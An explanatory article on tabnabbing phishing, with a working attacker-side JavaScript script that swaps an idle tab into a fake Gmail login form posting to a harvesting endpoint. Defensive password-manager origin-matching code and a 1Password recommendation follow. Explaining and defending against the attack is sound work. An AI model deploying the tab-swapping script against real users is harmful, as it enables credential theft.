Tabnabbing is a phishing attack that persuades users to submit their login details to what they believe is a popular website, by impersonating that site inside a browser tab the user already has open. The name was coined in early 2010 by Aza Raskin, a security researcher and interface designer. The attack exploits users' trust in, and inattention to, their open tabs, together with the ability of a web page to rewrite its own tab title, favicon and contents long after the page has loaded.
The steps in detail, from the attacker's point of view:
1. A user navigates to your normal-looking site.
2. You detect when the page has lost focus and has not been interacted with for a while.
3. You then swap the page's favicon and title for the target's (Gmail in this example) and replace the page contents with a look-alike of the Gmail login page. The tab's address does not change; only what the user sees inside the tab and in the tab strip does.
4. As the user scans their many open tabs, the favicon and title act as a strong visual cue. Memory is malleable, and the user will most likely assume they left a Gmail tab open. When they click back to the fake Gmail tab, they see the familiar Gmail login page, assume they have been logged out, and enter their credentials. The attack preys on the perceived immutability of tabs.
5. After the user has entered their login information and it has been sent to your server, you redirect them to Gmail. Because they were never logged out in the first place, it appears as if the login was successful.
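The tab-swapping logic of steps 2 through 5, as an added example written for this page; it is not Aza Raskin's demo code and does not come from the original post. The trigger is a small state machine fed with timestamps so it can be exercised outside a browser, and the DOM adapter at the bottom only runs when a `window` and `document` exist. The target details (title, favicon path, the `/collect` endpoint, the idle threshold) are placeholders chosen for the example, not real Gmail assets.

```javascript
// Added example for this page, not code from the original post or Aza Raskin's demo.
// Attacker-side logic of a tabnabbing page: wait until the tab has been unfocused
// and idle for a while, then rewrite its title, favicon and body to look like the target.

const IDLE_MS = 10 * 1000; // how long the tab must sit unfocused before the swap (demo value)

// Placeholder for the impersonated site. All values are constructed for this example;
// a real attack copies the target's actual title, favicon and login markup.
const TARGET = {
  title: 'Gmail: Email from Google',          // what the tab strip will show after the swap
  favicon: '/static/fake-gmail-favicon.ico',  // hypothetical path on the attacker's own host
  harvestPath: '/collect',                    // hypothetical endpoint on the attacker's own host
  realLoginUrl: 'https://mail.google.com/',   // where the victim is sent afterwards (step 5)
};

// Pure part: decides WHEN to swap (step 2). Timestamps are passed in, so it is deterministic.
class TabnabTrigger {
  constructor(idleMs = IDLE_MS) {
    this.idleMs = idleMs;
    this.blurredAt = null; // time the tab lost focus; null while the tab is focused
    this.swapped = false;  // the swap happens at most once
  }
  onBlur(now) { if (this.blurredAt === null) this.blurredAt = now; }
  onFocus() { this.blurredAt = null; }                                  // user came back early: wait for the next blur
  onActivity(now) { if (this.blurredAt !== null) this.blurredAt = now; } // any input restarts the idle clock
  shouldSwap(now) {
    return !this.swapped && this.blurredAt !== null && now - this.blurredAt >= this.idleMs;
  }
  markSwapped() { this.swapped = true; }
}

// Pure part: decides WHAT the tab turns into (step 3). Returns the three things the
// victim sees: tab title, tab icon, and the page body.
function buildDisguise(target) {
  return {
    title: target.title,
    favicon: target.favicon,
    // Look-alike login form. It posts to the attacker's own origin; the (server-side,
    // not shown) handler for harvestPath stores the fields and answers with a redirect
    // to target.realLoginUrl, so the "login" appears to succeed (step 5).
    html: [
      `<form id="login" method="POST" action="${target.harvestPath}">`,
      '  <input name="Email" placeholder="Email">',
      '  <input name="Passwd" type="password" placeholder="Password">',
      '  <button type="submit">Sign in</button>',
      '</form>',
    ].join('\n'),
  };
}

// Browser-only part: performs the swap on a real document.
function applyDisguise(doc, disguise) {
  doc.title = disguise.title;
  let link = doc.querySelector('link[rel~="icon"]');
  if (!link) {
    link = doc.createElement('link');
    link.rel = 'icon';
    doc.head.appendChild(link);
  }
  link.href = disguise.favicon; // browsers repaint the tab icon when the icon href changes
  doc.body.innerHTML = disguise.html;
}

// Browser-only part: wire the state machine to focus, visibility and input events.
if (typeof window !== 'undefined' && typeof document !== 'undefined') {
  const trigger = new TabnabTrigger();
  window.addEventListener('blur', () => trigger.onBlur(Date.now()));
  window.addEventListener('focus', () => trigger.onFocus());
  document.addEventListener('visibilitychange', () =>
    document.hidden ? trigger.onBlur(Date.now()) : trigger.onFocus());
  for (const ev of ['mousemove', 'keydown', 'scroll']) {
    document.addEventListener(ev, () => trigger.onActivity(Date.now()));
  }
  setInterval(() => {
    if (trigger.shouldSwap(Date.now())) {
      applyDisguise(document, buildDisguise(TARGET));
      trigger.markSwapped();
    }
  }, 1000);
}
```

Two things worth noticing. The page can change everything a user glances at in the tab strip, but it cannot change `location` without actually navigating, so the address bar still shows the attacker's origin after the swap; that is the one cue the victim (or a password manager) can rely on. And the swap is a title and favicon change on a tab that is not focused, which is unusual enough to serve as a heuristic for browser extensions that want to flag it.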
Aza also notes that the attack could get a lot more potent if the attacker (a) used the CSS :visited history leak to discover which sites the user has visited, and (b) employed other techniques, such as timing attacks, to determine which services the user is currently logged into, so that the fake page impersonates a site the victim actually uses.
What should you do to protect yourself? Aza suggests using Firefox, which has an Account Manager feature intended to protect against this kind of attack. But what about the next phishing attack? Or what if you prefer a different browser? Read on for a better solution that works with just about any browser you choose.
To protect yourself against tabnabbing, use a password manager such as 1Password. If you have not heard of 1Password, this is a good opportunity to check it out. 1Password not only generates strong, unique passwords for you, it also stores your login information and fills in forms automatically so you never have to type them, which protects you from credential harvesting and saves a lot of time. Note that 1Password only fills in login information for sites you have saved it for, and it decides which site it is on from the site itself rather than from how the page looks, so it cannot be fooled the way the human eye can. For instance, if you save your Gmail login in 1Password and another website tricks you into thinking it is Gmail, 1Password will not offer your Gmail credentials there: the address of the fake tab never became Gmail's, even though its title, favicon and contents did.
One feature I especially like is Fill and Submit. Say you accidentally close a tab where you were about to log in and open a new one; Fill and Submit pulls up the proper site and logs you in automatically. What you almost certainly will not do is blindly type your username and password into whatever tab is in front of you, because 1Password makes it so easy to do it securely. 1Password costs $40 but comes with a 30-day trial; it also has an iPhone and iPad app and can sync your password data via Dropbox.
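Why a password manager is not fooled by the swapped tab, as an added example written for this page: this is not 1Password's code and makes no claim about 1Password's exact matching policy. The vault entries and URLs are constructed for the example. The check shown is the simplest sound one, comparing the tab's real address against the saved entry by exact origin (scheme, host, port); real products also offer matching on the registrable domain, which this example does not implement.

```javascript
// Added example, not 1Password's code. A password manager keys its fills on the
// address the browser actually holds for the tab, which a tabnabbed page cannot
// change, rather than on the page's title, favicon or appearance.

// Constructed vault: what the user has saved.
const VAULT = [
  { name: 'Gmail',   url: 'https://accounts.google.com/ServiceLogin', username: 'alice@gmail.com' },
  { name: 'Example', url: 'https://www.example.com/login',            username: 'alice' },
];

// Reduce a URL to its origin: scheme + host + port. The URL parser lower-cases the
// host, drops default ports and IDNA-encodes non-ASCII labels, so look-alike hosts
// end up as distinct strings. Returns null for anything that is not an http(s) URL.
function originOf(url) {
  try {
    const u = new URL(url);
    if (u.protocol !== 'https:' && u.protocol !== 'http:') return null;
    return u.origin;
  } catch (e) {
    return null; // unparsable input never matches anything
  }
}

// Exact-origin policy: fill only when the tab's origin equals the saved origin.
// An entry saved on https is never filled on an http page (downgrade), and a
// look-alike hostname (extra label, homoglyph, typo) is simply a different origin.
function matchesSavedLogin(entry, pageUrl) {
  const saved = originOf(entry.url);
  const page = originOf(pageUrl);
  return saved !== null && page !== null && saved === page;
}

// The entries the manager would offer for the tab the user is looking at.
function loginsFor(vault, pageUrl) {
  return vault.filter((entry) => matchesSavedLogin(entry, pageUrl));
}

// Scenarios (the tab's real address is what matters, not what it displays):
//   a tabnabbed tab that now looks like Gmail but still lives on the attacker's site
//     loginsFor(VAULT, 'https://my-blog.example/posts/42')                 -> []
//   the genuine site, different path                     -> [Gmail entry]
//     loginsFor(VAULT, 'https://accounts.google.com/signin/v2')
//   a host that merely starts with the real name         -> []
//     loginsFor(VAULT, 'https://accounts.google.com.evil.example/ServiceLogin')
//   the real host over plain http                        -> []
//     loginsFor(VAULT, 'http://accounts.google.com/ServiceLogin')
```

The user-facing equivalent of this check is reading the address bar before typing a password; the manager just does it consistently. Exact-origin matching is deliberately strict: it will not offer the Gmail entry on another google.com subdomain, which is why products usually add a registrable-domain rule on top, and why homoglyph domains are handled by the parser's IDNA encoding rather than by any visual comparison.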